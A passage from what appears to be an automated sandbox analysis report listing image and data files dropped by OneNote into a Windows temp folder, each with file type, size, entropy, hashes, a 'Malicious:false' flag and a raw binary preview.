                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F3A7E25B-1323-4DCE-9755-3CF19C72D42D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52945
                                                                                                                                            Entropy (8bit):7.6490972666456765
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                            MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                            SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                            SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                            SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F42295B9-30FE-4332-892E-1B626CD3DBBF}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32656
                                                                                                                                            Entropy (8bit):3.9517299510231485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                            MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                            SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                            SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                            SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F457A9EE-AB8A-4309-B980-C1B60B8BF0CF}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F5AA5CDF-477B-41A0-A107-8A34A427788C}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F5BE23C7-CB2D-4901-B722-2714C7CA9B77}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F64E4B1F-E29B-4C15-8BC1-1AE97072CC96}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F69A99DA-6ADD-45EF-9E90-9DCB8B09AFDD}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F6F2537A-8418-440F-B1C3-A527EF0B8200}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4744
                                                                                                                                            Entropy (8bit):0.6436586323452695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:RaU2lbYyf9/UffA4g2oOeYCBYGUWf/HYG8:YrlbYyfSg4g2oOeXVUMV8
                                                                                                                                            MD5:E0655AA373A699A39EE0B8478F74F8A1
                                                                                                                                            SHA1:5E4DE2820BEFB007C13896FAA3BF13B049C042A2
                                                                                                                                            SHA-256:234753494380FB826F7D1A5985CC5248EBCC725236ED8A3C52A97388F432C4EA
                                                                                                                                            SHA-512:4B9B2695D9FAA4EEE9F68B1486DA743CE4E6578D4424DF16909A880F4DE6575695A171890199A76FAF328FB41B273C426B2608EB1E95C5B8B1E4476D7F281AE4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:./.C..vL....W"v_.'f.U.K._......................?.....I...............................................................................................................h..............................................|.g.M...].$...........I.N+7M......:.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F73D1268-1712-4FE4-8758-B3CB81E6F74C}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):109698
                                                                                                                                            Entropy (8bit):7.954100577911302
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                                                            MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                                                            SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                                                            SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                                                            SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{F928EFD4-3CBE-4A24-9599-A40C3FFF5FC5}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{FA7E2807-FD4A-4892-8133-63BB3E79FC98}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{FAD53036-A8E1-4E4C-9523-0672AD755E54}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{FB9404B5-4812-4348-A5B1-9B35B4824FEC}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
